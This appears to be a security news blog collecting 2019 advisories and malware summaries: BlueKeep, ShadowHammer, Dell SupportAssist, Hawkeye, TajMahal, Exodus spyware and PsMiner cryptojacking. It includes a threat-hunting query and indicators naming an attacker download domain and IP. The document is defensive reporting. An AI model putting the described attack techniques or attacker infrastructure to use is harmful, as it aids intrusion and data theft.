Tuesday, May 14, 2019

Microsoft Releases a critical Remote Code Execution vulnerability for Windows 7, Windows Server 2008 R2, and Windows Server 2008

Microsoft released fixes for a critical Remote Code Execution vulnerability, CVE-2019-0708, in Remote Desktop Services – formerly known as Terminal Services – that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017. While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware. 

Now that I have your attention, it is important that affected systems are patched as quickly as possible to prevent such a scenario from happening. In response, we are taking the unusual step of providing a security update for all customers to protect Windows platforms, including some out-of-support versions of Windows. 

Vulnerable in-support systems include Windows 7, Windows Server 2008 R2, and Windows Server 2008. Downloads for in-support versions of Windows can be found in the Microsoft Security Update Guide. Customers who use an in-support version of Windows and have automatic updates enabled are automatically protected.  

Out-of-support systems include Windows 2003 and Windows XP. If you are on an out-of-support version, the best way to address this vulnerability is to upgrade to the latest version of Windows. Even so, we are making fixes available for these out-of-support versions of Windows in KB4500705

Customers running Windows 8 and Windows 10 are not affected by this vulnerability, and it is no coincidence that later versions of Windows are unaffected. Microsoft invests heavily in strengthening the security of its products, often through major architectural improvements that are not possible to backport to earlier versions of Windows.  

There is partial mitigation on affected systems that have Network Level Authentication (NLA) enabled. The affected systems are mitigated against ‘wormable’ malware or advanced malware threats that could exploit the vulnerability, as NLA requires authentication before the vulnerability can be triggered. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. 

It is for these reasons that we strongly advise that all affected systems – irrespective of whether NLA is enabled or not – should be updated as soon as possible.  

Resources
Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008
Links to downloads for Windows 2003 and Windows XP  


Source Microsoft TechNet

Wednesday, May 8, 2019

New About Bitlocker enhancements

Microsoft is excited to announce enhancements to BitLocker management capabilities in both Microsoft Intune and System Center Configuration Manager (SCCM), coming in the second half of 2019. Whether your management infrastructure is on-premises or in the cloud, robust BitLocker management is required for today’s enterprises to secure modern endpoints.
 
Microsoft provides a range flexible BitLocker management alternatives to meet your organization’s needs, as follows:
  •     Cloud-based BitLocker management using Microsoft Intune
  •     On-premises BitLocker management using System Center Configuration Manager
  •     Microsoft BitLocker Administration and Monitoring (MBAM)

To learn more about the new enhancements to BitLocker Go Here
Detailed Information found on Microsoft web site..

Monday, May 6, 2019

Alert: Phishing Scam Email From "sales@icann.org"

Normally I would not post a Phishing attack but this one seems to be working
02 May 2019
LOS ANGELES – 2 May 2019 – The Internet Corporation for Assigned Names and Numbers ("ICANN") has received reports that a phishing email from "sales@icann.org" has been sent to ICANN contracted parties.
The sales@icann.org email address, for example, is not a valid ICANN organization email address. Contracted parties may have recently received emails from "accounting@erp.icann.org", which is a valid ICANN org email address. If you receive an email from the "sales@icann.org" address, or any other suspicious email address, do not respond. Please forward the email in its entirety to globalsupport@icann.org.
For additional information about phishing scams, visit https://www.icann.org/resources/pages/phishing-2013-05-03-en.

About ICANN

ICANN's mission is to help ensure a stable, secure, and unified global Internet. To reach another person on the Internet, you need to type an address – a name or a number – into your computer or other device. That address must be unique so computers know where to find each other. ICANN helps coordinate and support these unique identifiers across the world. ICANN was formed in 1998 as a not-for-profit public-benefit corporation with a community of participants from all over the world.
 

New NIST draft practice guide, SP 1800-15, “Securing Small-Business and Home Internet of Things (IoT) Devices


The National Cybersecurity Center of Excellence (NCCoE) has published a preliminary draft practice guide, SP 1800-15, “Securing Small-Business and Home Internet of Things (IoT) Devices: Mitigating Network-Based Attacks Using Manufacturer Usage Description (MUD),” and is seeking public comments. The popularity of IoT devices is growing rapidly, as are concerns over their security. IoT devices are often vulnerable to malicious actors who can exploit them directly and use them to conduct network-based attacks. SP 1800-15 describes for IoT product developers and implementers an approach that uses MUD to automatically limit IoT devices to sending and receiving only the traffic that they require to perform their intended functions.

We will use this feedback to help shape the next version of this document.

Please submit your comments by June 24, 2019. See the publication details link below for a copy of the document and instructions for submitting comments.


New NIST Drafts 8213 Reference for Randomness Beacons: Format and Protocol Version 2


NIST has released Draft NIST Internal Report (NISTIR) 8213, A Reference for Randomness Beacons: Format and Protocol Version 2, for public comment. A randomness beacon is a timed source of public randomness. It pulsates fresh randomness at expected times and makes it available to the public. The pulses contain random values that are timely generated, stored, timestamped, signed and hash-chained in a publicly-readable database. Thereafter, any external user can retrieve—via database queries—any past pulse and its associated data. Beacons offer the potential to improve fairness, auditability and efficiency in numerous societal applications that require randomness. A notable benefit of using public randomness is in enabling after-the-fact verifiability, for the purpose of public transparency.

Draft NISTIR 8213 provides a reference for implementing interoperable randomness beacons. The document defines terminology and notation, a format for pulses, a protocol for beacon operations, hash-chaining and skiplists of pulses, and the beacon interface calls. It also provides directions for how to use beacon randomness, and includes security considerations. With the release of this draft publication, NIST intends to seek constructive feedback from interested parties.

The public comment period for this draft closes on August 5, 2019. See the publication details link below for the document and instructions for submitting comments.

NOTE:  A call for patent claims is included on page iv of this draft. For additional information, see the Information Technology Laboratory (ITL) Patent Policy--Inclusion of Patents in ITL Publications.

Publication detaills:
https://csrc.nist.gov/publications/detail/nistir/8213/draft


NIST Randomness Beacon project:
https://www.nist.gov/programs-projects/nist-randomness-beacon



Saturday, May 4, 2019

E-mail Signature Verification Methods Secuity Issue

    E-mail changed the communication world forever, allowing for instant communication as opposed to what is now commonly referred to as “snail mail”. When it was designed, security was not really a concern that was built in. Over time cryptographic methods were developed to help communicators verify the authenticity of senders through electronic signatures, such as the OpenPGP and Signed Multipurpose Internet Mail Extensions (S/MIME) standards. However, new research has discovered some serious flaws in many popular implementations of these methods.

    Researchers from Ruhr University Bochum and M√ľnster University of Applied Sciences tested 25 popular e-mail clients from various operating systems including Windows, Linux™, macOS, iOS, and Android as well as web-based clients to see how they fared against signature spoofing attacks. The team used five attack classes with the goal of the attacker being able to “create and send an email with arbitrary content to Bob whose email client falsely indicates that the email has been digitally signed by Alice” where Bob and Alice are legitimate communicators who have securely exchanged cryptographic keys/certificates.

These classes are:
    • Exploiting flaws due to mishandling of Cryptographic Message Syntax (CMS).
    • Performing GnuPG API injection attacks.
    • MIME attacks against handling of partially signed messages.
    • Displaying a valid ID on the e-mail header with a false signature.
• Using HTML and CSS to mimic valid signatures in the user interface.
    The testing revealed that 14 of 20 OpenPGP clients and 15 of 22 S/MIME clients were at least partially vulnerable to these attacks. Many were able to be tricked with spoofed signatures on all UI levels, with all of the subset being able to spoof a signature even with limitations that could still go unnoticed by users. The only client to show no vulnerabilities on the OpenPGP or S/MIME tests was the web client Horde/IMP. This testing shows that just because certain standards and methods may be in wide use doesn’t necessarily mean they are secure by default. For a full list of tested clients and detailed testing methods and results, please refer to the “johnny-fired” PDF from the researchers linked below.
Sources:
https://thehackernews.com/2019/04/email-signature-spoofing.html 
https://github.com/RUB-NDS/Johnny-You-Are-Fired/raw/master/paper/johnny-fired.pdf
https://www.technadu.com/popular-email-clients-vulnerable-signaturespoofing-attacks/66443/05

Dells SupportAssist Vulnerability

    The Dells SupportAssist software is currently associated with a vulnerability allowing Remote Code Execution (RCE) attacks. It comes pre-installed on virtually all new Dell devices running Windows®, the SupportAssist application "proactively checks the health of your system’s hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting to begin."

    Dell released an advisory, DSA-2019-051: Dell SupportAssist Client Multiple Vulnerabilities, where it announced "An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites." The vulnerability is being tracked as CVE-2019-3719 and comes with a Base Severity score 8.0 HIGH in NIST’s CVE database. MITRE has performed an analysis on the vulnerability and has also added that description to the CVE stating, “Dell SupportAssist Client versions prior to 3.2.0.90 contain a remote code execution vulnerability. An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables.”
    Primarily Dell uses the SupportAssist application to be able to install drivers and other software remotely, but to accomplish this, it must be able to detect what is already present on your system.   Installing the SupportAssist package installs two packages, the SupportAssistAgent, and the Dell Hardware Support service. The services essentially expose a REST API of sorts which supports the communication between the service and Dell’s websites.

    Security researcher Bill Demirkapi who discovered the vulnerability states in his blog “On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.
ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.”

    It should also be noted that Demirkapi discovered the vulnerability in September of 2018 and promptly sent a write up to Dell explaining the RCE vulnerability. Dell confirmed the vulnerability on 11/22/2018 and finally released a patch and advisory on 4/18/2019. 
Sources: 
https://nvd.nist.gov/vuln/detail/CVE20193719#vulnCurrentDescriptionTitle
https://d4stiny.github.io/RemoteCode-Execution-on-most-Dellcomputers

Thursday, May 2, 2019

Windows Server Summit 2019 on May 22nd, 2019

Wednesday, May 22, 2019 9:00 AM–11:00 AM Pacific Time

Join this virtual event to learn about strategies, insights, and technologies to modernize and manage your Windows Server ecosystem. Be among the first to learn about exciting new product capabilities. 
You’ll also:
  • Discover what’s new in Windows Server 2019, Windows Admin Center, and Azure Stack HCI.
  • Learn how to take advantage of Azure services to integrate your on-premises environment with the cloud. 
  • Get tips and tricks to modernize your evolving applications and infrastructure before support for Windows Server 2008 and 2008 R2 ends. 
Agenda:
  • Innovations in Microsoft’s hybrid strategy: Deep dive into Microsoft’s hyperconverged technologies and how to add hybrid services from Azure.
  • Modernize Windows Server apps and workloads: Learn about security, Remote Desktop Services, containers, and features on demand.
  • New in management and security: See what’s new in Windows Admin Center, System Center 2019, and Windows Server 2019.
  • Insights and best practices: Chat with Windows Server community experts.
  • Looking ahead: Learn more about Windows Server Semi-Annual Channel and Windows Server on Azure.
Register here

Hawkeye malware kit

    Researchers have found a new version of the Hawkeye malware kit and have noticed that alongside technical advances, they’ve included some business improvements.

    While Hawkeye has been a product since 2013, the recent change in ownership at the end of 2018 has decided that change beyond just its capabilities is in order. Providing a business via a licensing model extends the longevity and security of a revenue source and maintains the sales relationship with minimal effort. Including a terms of service that forbids illicit use sheds a small degree of liability, but including a restriction against their product being scanned by antivirus software seems to negate any possible plausible deniability. These steps seem to be an effort to distance the provider from the “troubled youth” of the malware and legitimize it to some degree but utterly fails to actually reform it.

    The malware itself is found in ongoing malware campaigns since mid 2018, before the regime change. The formula adheres to many of the usual suspects: vague emails about fiscal functions and duties that sound urgent, confirmations and audits of things that require oversight, general notices of company gatherings with details not contained in the body of the email, and other pedestrian and mundane pieces of bait for the weaponized Excel hook. Sometimes an RTF or Doc file is used for older campaigns and occasionally the malicious document is stored a few more steps away in a drobox or other file sharing location.

    The current attacks use the CVE-2017-11882 vulnerability, a buffer overflow vulnerability in Excel’s equation editor. It triggers the memory handling error when the  data sent for the font name is too long which then allows the attacker to execute arbitrary code on the victims machine with the victims level of privilege. 
    At this point the attacker downloads a payload from an attacker controlled server, which decompiles itself and retrieves a final payload which cements Hawkeye in the user’s system. The researchers found tools not used in the current campaign such as Anti-Virtual machine detection, USB drive infection, and others.
   Hawkeye itself offers keylogging, systems monitoring, and other espionage tools as well as a way to exfiltrate data collected and technical support for as long as your license is valid. The latest campaign hinges on a vulnerability that has since been patched. As always, update your programs and be vigilant of any suspicious documents.
Sources: 
https://securityaffairs.co/wordpress/84008/malware/hawkeyestealer.html
https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html
https://threatpost.com/hawkeye-keylogger-malspam-campaigns/143807/

Security Issues with Macro enabled Systems

   Macro enabled Office documents are a useful tool for automating advanced calculations in document files but they have a long history of abuse as well. They are easy to spot as documents containing embedded Visual Basic for Applications (VBA) code have a ‘m’ at the end of the filename, e.g .xlsm or .docm. When opening these files Microsoft Office asks if you would like to enable the embedded macros, and for good reason. They can be used to run malicious code on a target system or infect the computer with malware.

    Researchers at Checkpoint recently uncovered a new malicious document campaign targeting government finance entities and several embassies in Europe. If these documents are opened with macros enabled they drop multiple malicious AutoHotKey scripts onto the target system and begin communicating with command and control servers to exfiltrate data. Specifically the document drops 4 files, the AutoHotKey program itself and 3 scripts used to gather information or take control of the computer. ‘htv.ahk’ is the most dangerous of the 3 scripts dropped, it grabs a malicious version of Teamviewer, executes it, and then sends login credentials to the attackers server.

    The malicious version of Teamviewer has a few interesting modifications. First it completely hides the running instance so that the attacker can take control without the user receiving any notifications the way that the standard version would provide. It also allows for the transfer and execution of additional .exe and .dll files onto the target machine. The standard version of Teamviewer only supports transferring files; execution would be done through the Windows GUI. Later versions of the malicious Teamviewer application also provide a more traditional command and control mechanism via text based commands. This interface allows the attacker to do much more including searching for files or download and execution of files from an external webserver.

    Checkpoint acknowledges that in most cases it is difficult to provide attribution for attacks such as these. In this case however they were able to find posts on a clearnet hacking forum with code samples identical to the ones used in the campaign. Beyond the identical code samples the user ‘EvaPicks’ was also talking about techniques used in the campaign. 

    Most high end firewalls will inspect macro enabled document files with extra scrutiny because of attacks like this. AutoHotKey is also frequently detected as malicious software by anti virus programs despite its legitimate use in task automation. Regardless end users must remain vigilant when opening files from unknown sources in order to protect sensitive information and equipment.
Sources:
https://research.checkpoint.com/finteam-trojanized-teamviewer-againstgovernment-targets/
https://threatpost.com/teamviewer-attacks-state-department/144014/

TajMahal is a highly modular piece of malware ALERT

     With today’s cyber-focused society, there are numerous security companies constantly on the lookout for new variants of malware and threats that haven’t been seen before. So when new malware is discovered that not only provides a wide array of capabilities but also remained under the radar for 5 years, it begs further investigation. Researchers at Kaspersky Lab recently uncovered such a malware, which they dubbed TajMahal.

     TajMahal is a highly modular piece of malware that was discovered in late 2018 attacking a Central Asian diplomatic agency. It contains 80 different plugins for various capabilities, one of the highest amounts ever seen with an APT. The developers of TajMahal have also made it very stealthy, including using behavioral detection avoidance and creating a new codebase from the ground up rather than using existing code from other sources. The malware contains 2 main modules: Tokyo and Yokohama. 

     While the initial stage of infection is unclear, the first stage of TajMahal is the Tokyo package. This contains 3 modules that install backdoors on the system, run PowerShell scripts, and establish contact with command and control servers. This module then downloads the second package, Yokohama.
  Yokohama is the main data exfiltration module that contains most of the plugins used for obtaining data. It includes “backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim's machine” according to the re Exodus searchers. It can even see files that were accessed on removed USB drives and then copy that specific file the next time the drive is plugged in. The stolen data is exfiltrated using an XML file named TajMahal, hence the name researchers gave the malware itself.

  While TajMahal has only been seen attacking the one organization, researchers have found some aspects of the malware that lead them to believe there may be other versions out in the wild that haven’t been detected yet. Samples studied so far suggest that the group behind the malware has been active since the Fall of 2014, so it is doubtful this will be the last that is seen from them.
Sources:
https://thehackernews.com/2019/04/apt-malware-framework.html 
https://threatpost.com/meettajmahal/143644/ 
https://securelist.com/projecttajmahal/90240/

Spyware Now Targets iOS

  The Exodus spyware now also exists in the iOS ecosystem. The package can take and deliver audio recordings, pictures, contacts, and location data. The spyware researchers note that the iOS version of the spyware delivers itself via phishing sites that imitate mobile carriers from Italy and Turkmenistan. According to research by both Lookout and Security without Boarders, the spyware appears to have developed over the span of 5 years.

    The spyware works in three stages: first it lands on the victim’s machine with a lightweight dropper, then it fetches a larger second stage payload which contains several binaries, finally, the third stage typically uses the Dirty COW exploit (CVE20165195) to obtain root privileges on the infected device.  Technical details suggest that it may have started life as a legitimate package for government or law-enforcement use. Details indicate that the software was very likely a well-funded project intended for the lawful intercept market. The software makes use of valid certificate-pinning and public key encryption for command-and-control communications, and geo-restrictions, along with a comprehensive well-implemented suite of surveillance features.

   The Android samples led researchers to samples of an iOS variant. The attackers spoofed both Wind Tre SpA, and TMCell sites. An Italian mobile and a Turkmenistan state owned carrier respectively.  In order to spread the iOS version outside of the App Store, the cybercriminals abused Apple’s enterprise provisioning system. Allowing them to sign the apps with legitimate Apple certificates. The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary/in-house apps to their employees without the use of the iOS App Store. The apps themselves dovetail with the phishing sites, recommending that user keep the apps installed and under WiFi coverage to be contacted by operators for assistance.  While the iOS version of the app seems to be more crude than the android counterpart. It might not have the ability to leverage known vulnerabilities, but it was still able to utilize well known API’s to exfiltrate  contacts, photos, videos and audio recordings using a required push notification setting.

   Exodus is thought to be linked to eSurv, an Italian software developer based in Catanzaro in Calabria who is well known for software specializing in CCTV management, surveillance drone, and facial and license-plate recognition software. eSurv is currently under investigation by Italian authorities per local news reports.  Each of the phishing sites contain links to metadata such as the application name, version, icon, and an URL for the IPA file.  An IPA package must contain a mobile provisioning profile with an enterprise’s certificate to be distributed outside the app store. All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L. 

Sources:
https://it.slashdot.org/story/19/04/08/221253/exodus-spyware-foundtargeting-apple-ios-users
https://threatpost.com/exodus-spyware-apple-ios/143544/

Friday, March 29, 2019

A Compromised the ASUS update infrastructure through auto-update software is causing a supply chain attack


Executive summary


The software supply chain continues to be a popular channel for launching attacks. Publicly available reports indicate that attackers have reached a large number of devices through auto-update software provided with computers from Taiwanese manufacturer ASUS. In a campaign dubbed “Operation ShadowHammer”, attackers have compromised the ASUS update infrastructure to deliver backdoored versions of the Asus Live Update app, which comes preinstalled on ASUS computers.

Microsoft is actively investigating available reports as well as malware samples and telemetry. We have consolidated detections of malicious binaries involved in this attack under the name ShadowHammer.

ASUS has indicated that they have replaced the backdoored version of their updater and implemented enhancements to their infrastructure. Microsoft continues to investigate this threat and will provide updates as we get more information.
ASUS has also implemented a fix in the latest version (ver. 3.6.8) of the Live Update software, introduced multiple security verification mechanisms to prevent any malicious manipulation in the form of software updates or other means, and implemented an enhanced end-to-end encryption mechanism. At the same time, we have also updated and strengthened our server-to-end-user software architecture to prevent similar attacks from happening in the future.
Additionally, we have created an online security diagnostic tool to check for affected systems, and we encourage users who are still concerned to run it as a precaution. The tool can be found here: https://dlcdnets.asus.com/pub/ASUS/nb/Apps_for_Win10/ASUSDiagnosticTool/ASDT_v1.0.1.0.zip
Users who have any additional concerns are welcome to contact ASUS Customer Service.

More information about APT groups: https://www.fireeye.com/current-threats/apt-groups.html

 
  • How do I know whether or not my device has been targeted by the malware attack?
  • Only a very small number of specific user group were found to have been targeted by this attack and as such it is extremely unlikely that your device has been targeted. However, if you are still concerned about this matter, feel free to use ASUS’ security diagnostic tool or contact ASUS Customer Service for assistance.
  • What should I do if my device is affected?
  • Immediately run a backup of your files and restore your operating system to factory settings. This will completely remove the malware from your computer. In order to ensure the security of your information, ASUS recommends that you regularly update your passwords.
  • How do I make sure that I have the latest version of ASUS Live Update?
  • You can find out whether or not you have the latest version of ASUS Live Update by following the instructions shown in the link below:
    https://www.asus.com/support/FAQ/1018727/
  • Have other ASUS devices been affected by the malware attack?
  • No, only the version of Live Update used for notebooks has been affected. All other devices remain unaffected.
 

Analysis

Our ShadowHammer detections center around variants of the backdoored Asus Live Update app representing at least two generations of attack code. These generations are marked by samples with shellcode that are either in plaintext or encrypted. Also, the appearance of these updater variants corresponds to the validity dates of the certificates used to sign them.
The backdoored updaters might have been designed to target specific computers. They contain hardcoded MD5 hashes representing MAC addresses. They appear to use these hashes to identify targets and determine whether to deploy additional payloads.

Mitigations

Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
  • ​Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Utilize the Windows Defender Firewall and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.
  • Secure internet-facing RDP services behind a multi-factor authentication (MFA) gateway. If you don't have an MFA gateway, enable network-level authentication (NLA) and ensure that server machines have strong, randomized local admin passwords.
  • Customers that have not installed the ASUS Live Update app are not affected by the known attack method. Customers can either uninstall this app or get the latest version. According to Asus, version 3.6.8 includes a fix and additional mechanisms that can prevent manipulation of updates.
  • Utilize Microsoft Edge or other web browsers that support SmartScreen. SmartScreen has removed reputation information for the certificates abused during these attacks. Binaries signed with those certificates will trigger a warning about an “unrecognized app”.

Detection details

Windows Defender Antivirus
Windows Defender Antivirus detects trojanized apps and backdoor implants as the following malware:
Endpoint detection and response (EDR)
Alerts with the following titles in the Windows Defender Security Center portal can indicate threat activity on your network:
  • Malicious binaries associated with a supply chain attack
  • Network traffic to domains associated with a supply chain attack
Advanced hunting
Publicly available reports indicate that this attack took place from June to November 2018, so some customers might only have telemetry around this period. To locate related attack activity in the past 30 days, run the following query:
​//Event types that may be associated with the implant or container
union ProcessCreationEvents, NetworkCommunicationEvents, FileCreationEvents, ImageLoadEvents
| where EventTime > ago(30d)
//File SHAs for implant and container
| where InitiatingProcessSHA256 in("e01c1047001206c52c87b8197d772db2a1d3b7b4", 
"e005c58331eb7db04782fdf9089111979ce1406f", "69c08086c164e58a6d0398b0ffdcb957930b4cf2")
​//Download domain
NetworkCommunicationEvents
| where EventTime > ago(30d)
| where RemoteUrl == "asushotfix.com" or RemoteIP == "141.105.71.116"
The provided query checks events from the past 30 days. Change EventTime to focus on a different period.

Indicators

Files (SHA-1)
  • 2c591802d8741d6aef1a278b9aca06952f035b8f
  • e01c1047001206c52c87b8197d772db2a1d3b7b4
  • 5039ff974a81caf331e24eea0f2b33579b00d854
  • 9f0dbf2ba3b237ff5fd4213b65795595c513e8fa
  • e793c89ecf7ee1207e79421e137280ae1b377171
  • e005c58331eb7db04782fdf9089111979ce1406f
  • 4a8d9a9ca776aaaefd7f6b3ab385dbcfcbf2dfff
  • fdc7169d7e0a421dfb37ab2a9ecae9c9d5b4b8b2
Malware download URL
  • hxxp://asushotfix.com
URLs with compromised packages
  • hxxp://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip
  • hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip
  • hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip
  • hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip
Abused certificates
ASUSTeK Computer Inc. 
Status: This certificate has expired and is no longer valid.
Issuer DigiCert SHA2 Assured ID Code Signing CA
Valid from 12:00 AM 07/27/2015
Valid to 12:00 PM 08/01/2018
Valid usage Code Signing
Algorithm sha256RSA
Thumbprint 29935023FF1386F5F0A0355B778B0DFF2022E196
Serial number 0F F0 67 D8 01 F7 DA EE AE 84 2E 9F E5 F6 10 EA
ASUSTeK Computer Inc. 
Status: Valid
Issuer DigiCert SHA2 Assured ID Code Signing CA
Valid from 12:00 AM 06/20/2018
Valid to 12:00 PM 06/22/2021
Valid usage Code Signing
Algorithm sha256RSA
Thumbprint 626646D29C5B0E7C53AA84698A4A97BE323CF17F
Serial number 05 E6 A0 BE 5A C3 59 C7 FF 11 F4 B4 67 AB 20 FC

References

 
Sites to check if your device has been targeted
Thanks to various sources for this information including  ASUS, Fireeye,  and Susan E Bradley

 

Saturday, March 23, 2019

Metadata remnants patched on Google Photos

   A bug was discovered this week in Google Photos, where all photos in a users Google Photo account could have their metadata easily read and collected. Bad actors would target a particular query, for example, a location, and then measure the time it takes for the website to respond. Even though the response might be an access denied, there is value in knowing it’s presence or not. It is possible to confirm or deny the presence of particular tags in the photo when using this cross site search method of attack.

    Location is probably one of the more dangerous pieces of information that can be leaked using this attack as it is possible to build a timeline of the victim’s travels and location using consecutive searches. In the original report of this issue, the researcher was able to divine the approximate date and time of a visit to another country using a malicious website by interacting with a logged in google photos account.

    While this attack doesn’t give any access to the photos themselves, or anything other than whether or not the specified terms/queries exist, the benefits can be extrapolated out to schedules and can allow for more finely crafted malvertisements or phishing attempts. One could imagine a malware ridden site harvesting emails, gaining access to location information, and then sending malicious emails being sent concerning issues with travel expenses to a location which is lent more credence by the fact that our victim has traveled to the given location within the time frame that the email is sent.

   While this exploit in particular has been patched, there are countless other browser side attacks that can be exploited, and safeguarding your data is paramount. This attack shows how a clever adversary can wield information no matter how small the leakage. Tools are available for content control to prevent data leakage. Tools such as PuriFile can help you manage metadata, scrub documents of sensitive terms and information, and even help detect data that may be obfuscated.

Sources:
https://www.zdnet.com/article/google-photos-vulnerability-could-have-let-hackers-retrieve-image-metadata/

https://www.imperva.com/blog/now-patched-google-photos-vulnerabilitylet-hackers-track-your-friends-and-location-history/

Thanks to Peraton for this information

ELDERLY FRAUD AND ABUSE IN AMERICA RESOURCES

Please share important information  this with those who you know.

United States Attorney William P. Barr recently stated that crimes against the elderly target some of the most vulnerable people in our society. Because of their stage in life, they don't have the opportunity frequently to recover, and the losses are devastating to them.
Whether as the result of isolation, diminished cognition, financial insecurity, trusting too much, being ashamed to report being scammed or concerned about how relatives will react, serious concern for health or other causes, many of these crimes go unreported.

Information on The Federal Bureau of Investigation Site

https://www.fbi.gov/scams-and-safety/common-fraud-schemes/seniors


Information on The Department of Justice Site

The video below discusses scams and identity theft, looks at trends and gives tips and tools with a focus on the Federal Trade Commission's Pass It On  Campaign: 


Extent of elder abuse, causes and characteristics, addressing mistreatment, financial exploration and perpetrators:


Abuse by caregivers, domestic violence, fraud and financial abuse, training resources and tools, and additional information and resources: https://www.ncjrs.gov/elderabuse/

Contains prosecutor video series, federal financial exploitation resources, rural and tribal resources, multidisciplinary guide and toolkit, webinars for elder abuse professionals, elder abuse statutes and elder justice resources by state: https://justice.gov/elderlyjustice

Information on The Better Business Bureau Site


The BBB tracks reported scams throughout the U.S.

If you become aware of elder fraud and/or abuse, you are right to be concerned. If you SEE SOMETHING, please SAY SOMETHING in a timely manner to law enforcement, security and/or your supervisor, and give the authorities the chance to make a difference.

Friday, March 15, 2019

The Virtual Security Summit by Microsoft

This free event has lots of good content the session are listed below. the event is Streaming Live April 16 , 9-12 noon PT.
To register go here

Session
Featured Speakers
Securing emerging technologies

Learn about the new trends that will affect cybersecurity into the future of Internet of Things and Machine Learning, and learn how to maintain your organization’s resiliency throughout innovations in cybersecurity.

Sian John 
Chief Security Advisor, Microsoft EMEA 
 
Hafid Elabdellaoui 
Chief Security Advisor, Microsoft 
 
Evolution of cyberthreats: Customer conversation identity and threat

Join this discussion on the evolution of cyberthreats and the latest thinking on identity and threat protection tactics.
 
Joram Borenstein
General Manager, Cybersecurity Solutions Group, Microsoft
 
Kostas Georgakopoulos
Chief Information Security Officer, Procter & Gamble
 
The importance of security frameworks CIS, NIST and others

Fraud Detection as a Service (FDaaS) is helping government customers detect and prevent improper payments. Learn how your agency can save significant staff resources and ensure proper distribution of funds.
Curtis W. Dukes
Executive Vice President and General Manager
Security Best Practices and Automation Group, CIS
 
Sean Sweeney
Americas Director, Cybersecurity Solutions Group, Microsoft
 

Threat of Cryptojacking Still an Issue

In November of 2018 Forbes ran an article about the increase of cryptojacking. At the time the Cyber Threat Alliance (CTA) was indicating a 629% increase of infections in just the short time between Q1 to Q2 of 2018. Threats had grown from an estimated 400,000 (Q4 2017) infections to 2.5 million infected machines in Q2 of 2018. 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has grown. For example the Russian threat, WebCobra, that McAfee Labs researchers found, was able to drop one of two different payloads based on architecture it detected on the infected machine.

The threats are continuing to become more sophisticated as well.  360 Total Security researchers have released the details of the newer PsMiner malware. Designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SqlServer to spread from server to server to mine for Monero.

The worm uses a file called Systemctl.exe written in the Go language to bundle then download the exploit modules and to attack Windows servers. In addition to the exploits, PsMiner has the ability to brute force its way in to a system. When it detects weak or default credentials, it can utilize a brute force password cracking component.

Once it PsMiner has access to a system, it then uses a PowerShell command to download a WindowsUpdate.ps1 with a malicious payload and master module that will drop the Monero miner on the system. The malware then copies itself into the temp directory and create a scheduled task called “Update service for Windows Service” that will run once every 10 minutes to prolong and refresh the infection. Using the XMRig CPU miner and a custom mining profile while using Living-off-the-Land (LotL) techniques, the worm can persist for some time.

This also shows a level of sophistication to which the bad actors have access.  Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking malware on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These Apps have been since removed from the Microsoft store, but show a troubling pattern of predatory behavior.  Estimates are indicating that there have been ten times more organizations affected by cryptojacking than ransomware just last year. It is clear that cryptojacking is still a threat to consider in 2019.

Sources
https://www.bleepingcomputer.com/news/security/malware-spreads-as-a -worm-uses-cryptojacking-module-to-mine-for-monero/

https://www.forbes.com/sites/rachelwolfson/2018/11/13/cryptojackingon-the-rise-webcobra-malware-uses-victims-computers-to-minecryptocurrency/#20183346c336

https://blog.malwarebytes.com/cybercrime/2018/02/state-maliciouscryptomining/

Abandoned Cart plugin for WordPress sites exploit.

    Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t. All this without having the effort of hauling those things around a labyrinth of smells and sounds! And with the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you have a desire to pick up where you left off if a sudden pressing matter arises, or you simply lose interest for the time being. But WordFence security researchers have noticed a flaw in the execution of the Abandoned Cart plugin which enables a complete site takeover along with laying a secondary backdoor to regain access in case of discovery.

